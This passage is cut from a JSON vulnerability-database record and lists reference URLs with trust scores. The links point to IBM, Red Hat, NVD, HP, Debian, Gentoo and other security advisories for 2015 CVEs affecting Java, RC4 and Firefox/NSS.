"http://www-01.ibm.com/support/docview.wss?uid=swg21902369" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902541" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902697" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21902774" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902891" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903565" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21903800" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903805" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959069" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21959252" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960151" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960634" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963126" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963451" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21963526" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964496" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964610" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964625" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964730" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964808" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_april2015_advisory.asc" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/rc4_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960515" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101012625" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098822" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902710" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960711" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957999" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959525" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965448" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903747" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957855" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21959575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020751" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963024" }, { "trust": 0.3, "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-454055.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883122" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903636" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959577" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21903752" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964676" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005351" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903396" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697181" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960659" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967539" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903541" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21960815" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960248" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903029" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957813" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902986" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965485" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964027" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903651" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883582" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958017" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903247" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903256" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903516" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961223" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903031" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965404" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962552" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958919" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962214" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962216" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965553" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957919" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962838" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960075" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902765" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902862" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902866" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959306" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903394" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964236" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957995" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020752" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882717" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902374" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883253" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883258" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883731" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097737" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965555" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097608" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098303" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022181" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883682" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883588" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902568" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?rs=86\u0026uid=swg21883521" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882844" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883077" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883065" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883852" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005217" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098314" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883839" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882642" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882974" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902627" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005391" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902300" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883880" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883853" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883359" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902385" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902389" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883725" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700442" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21884071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022190" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883453" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882577" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098302" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902793" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883223" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701115" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883755" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883324" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882751" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882749" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883604" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097676" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883551" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883878" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005218" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883618" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099140" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883125" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022274" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882902" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882527" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882846" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097660" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883505" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960015" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883825" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883692" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883666" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883191" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21702144" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883440" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883397" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883255" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883309" }, { "trust": 0.3, "url": "https://download.novell.com/download?buildid=f5vvkpif5dk~" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005273" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005374" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005377" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005448" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009336" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960460" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962676" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965041" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966452" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967498" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967709" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967962" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968485" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970056" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970847" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098474" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883553" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1005231" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005230" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005278" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098183" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4760" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2621" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2601" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4732" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2632" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4000" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1207101#c11" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1223211#c33" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4733" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4748" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4731" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2625" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4749" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2808" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2590" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-2628" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2613" }, { "trust": 0.2, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.2, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.2, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-2664" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2627" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2637" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2638" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-2638" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-2627" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2664" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-2637" }, { "trust": 0.2, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html#appendixjava" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10705" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10727" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10163" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143456209711959\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143629696317098\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143818140118771\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143817899717054\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143817021313142\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144060576831314\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144069189622016\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144104565600964\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144060606031437\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144102017024820\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144059660127919\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144059703728085\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144043644216842\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143741441012338\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144104533800819\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144493176821532\u0026amp;w=2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/fa" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0810" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2730" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7204" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0803" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0801" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0812" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7182" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7193" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2729" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4495" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2743" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4518" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2808" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7181" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2737" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2733" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2739" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7215" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7195" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7199" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0808" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7187" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7207" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0801" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0807" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2735" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7201" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7200" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7192" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7196" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7203" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2728" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7197" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0816" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2731" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0810" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7205" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7194" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7211" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2730" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7217" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2742" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7191" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0812" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0811" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7212" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0813" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7188" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7189" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7210" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7202" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7220" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0799" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4515" }, { 